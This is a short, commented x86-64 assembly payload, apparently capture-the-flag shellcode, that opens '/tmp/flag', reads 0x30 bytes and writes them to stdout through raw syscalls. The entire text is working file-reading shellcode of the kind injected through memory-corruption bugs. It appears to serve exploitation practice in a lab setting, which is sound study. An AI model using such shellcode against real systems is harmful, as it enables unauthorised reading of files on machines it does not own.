push 0x67
mov rax, 0x616c662f706d742f
push rax
mov rdi, rsp	; rdi-> "/tmp/flag"
xor rsi, rsi	; rsi = 0	; RD_ONLY
xor rdx, rdx	; rdx = 0	; (NULL)
mov rax, 0x02	; rax = 2	; syscall_open
syscall	; open("/tmp/flag",RD_ONLY,NULL) = open(rdi, rsi, rdx)

mov rdi, rax	; rdi = fd	;may be 3??
mov rsi, rsp	; rsp -> "/tmp/flag"
sub rsi, 0x30	; rsi = rsp-0x30	; buf
mov rdx, 0x30	; rdx = 0x30	; len
mov rax, 0x00	; rax = 0	; syscall_read
syscall		; read(fd, buf, 0x30) = read(rdi, rsi, rdx)

mov rdi, 0x01	; rdi =1	; fd = stdout
mov rax, 0x01	; rax = 1	; syscall_write
syscall		;write(fd, buf, 0x30)




